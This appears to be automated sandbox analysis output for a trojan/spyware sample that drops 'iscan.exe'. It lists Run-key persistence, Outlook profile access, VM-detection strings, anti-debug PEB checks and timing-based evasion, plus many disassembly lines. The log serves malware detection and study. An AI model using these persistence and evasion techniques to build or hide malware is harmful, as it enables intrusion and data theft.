          Source: C:\Users\user\Desktop\PrWP76ejHO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\AppData\Local\Temp\iscan.exe File created: C:\Users\user\AppData\Roaming\iidryiceixqa
          Source: C:\Users\user\Desktop\PrWP76ejHO.exe File created: C:\Users\user\AppData\Local\Temp\nsd4ECF.tmp
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/14@4/4
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4468
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4864
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: ipconfig.pdb source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: iscan.exe, 00000001.00000003.250447257.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000001.00000003.251103890.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: iscan.exe, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AC36 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041B1E9 push esp; retf
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004212DC push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040EA97 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421329 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421332 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421393 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421449 push dword ptr [2957D30Eh]; ret
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00419F22 pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A7D0D1 push ecx; ret

          Persistence and Installation Behavior

          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\PrWP76ejHO.exe File created: C:\Users\user\AppData\Local\Temp\iscan.exe
          Source: C:\Users\user\AppData\Local\Temp\iscan.exe File created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe
          Source: C:\Users\user\AppData\Local\Temp\iscan.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run oipsxnj
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\iscan.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A56A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeAPI coverage: 9.7 %
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeAPI coverage: 6.7 %
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00410310 FindFirstFileExW,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000004.00000000.333529858.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.268461375.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.330583659.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000000.268461375.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040A9DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_004126DA GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A56A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040ED18 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_004113BB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0045007A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450005 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450019 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450149 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
